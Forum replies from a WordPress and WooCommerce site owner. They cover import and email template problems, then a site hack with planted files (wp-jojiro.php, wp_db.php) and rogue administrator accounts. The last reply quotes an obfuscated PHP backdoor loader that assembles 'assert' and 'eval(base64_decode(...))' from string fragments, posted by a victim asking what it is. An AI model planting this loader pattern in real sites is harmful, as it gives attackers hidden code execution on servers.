Forum Replies Created

Viewing 5 replies - 16 through 20 (of 20 total)
  • Thread Starter OpenTips

    (@sergeiweb)

    Hello @wpallimport,
    thank you for your respond!

    I’m using All Import plugin only for this, but I don’t have this option to upload additional variation images, only “Save variation image to the gallery” option.

    screenshot

    But I don’t need images for variations in the gallery, only to be attached for variations.

    Thread Starter OpenTips

    (@sergeiweb)

    Anyone? please help

    Thread Starter OpenTips

    (@sergeiweb)

    That’s what I found online (sorry, I’m not a programmer so probably this code is rubbish)

    for my functions.php

    function echo_1($attribute_value){ echo $attribute_value[‘pa_colorcode’]; }
    add_action(‘atr_colorcode’, ‘echo_1’);

    for email-order-items.php

    do_action(‘atr_colorcode’, array(‘color code:’) );

    Apparently it is not showing me anything in my email after ordering an item.

    Please help

    Thread Starter OpenTips

    (@sergeiweb)

    Well, problem was related to a recent hack-attack to my web-site.

    I’ve found such files as:

    wp-jojiro.php
    wp-dojika.php
    wp-orekio.php

    With code beginning as:
    <?php
    //Valar dohaeris
    $arya =?

    Also some files like wp_db.php located “here and there” at my web-page (most of them were in /plugins/ and /uploads/ folders) and new users with Administrator privileges.

    After cleaning all those files, killing new users, changing all passwords and fixing other recent (hack) changes in wp-config.php everything went back to the way it was.

    Now my web-site is working again.
    ??

    Thread Starter OpenTips

    (@sergeiweb)

    Thank you!

    I’ve tried to add php_value memory_limit 128M to my .htaccess file cause I have no access to php.ini but it gave me 500 Internal Server Error.

    Probably it is not working r ‘ doing something wrong. For some reason the whole web-site is down at this moment (happened before I’ve changed .htaccess)

    Will try to ask my hosting provider to temporarily increase PHP’s memory…

    Also I’ve found weird code in my plugins page.
    Looks like:

    “<?php
    //Valar dohaeris
    $arya = ‘CiRhsdfsdfsdfsgfsdgsdgdsgewawdasdd’;

    $tyrion = ‘as’ . ‘se’ . ‘rt’;
    $daenerys = sprintf(‘!ev’ . ‘al(b’ . ‘ase’ . ’64’ . ‘_’ . ‘de’ . ‘code’ . ‘ (“%s”))’, $arya);

    $tyrion(stripslashes($daenerys));
    ?>”

    Anyone knows what is that? Virus?

Viewing 5 replies - 16 through 20 (of 20 total)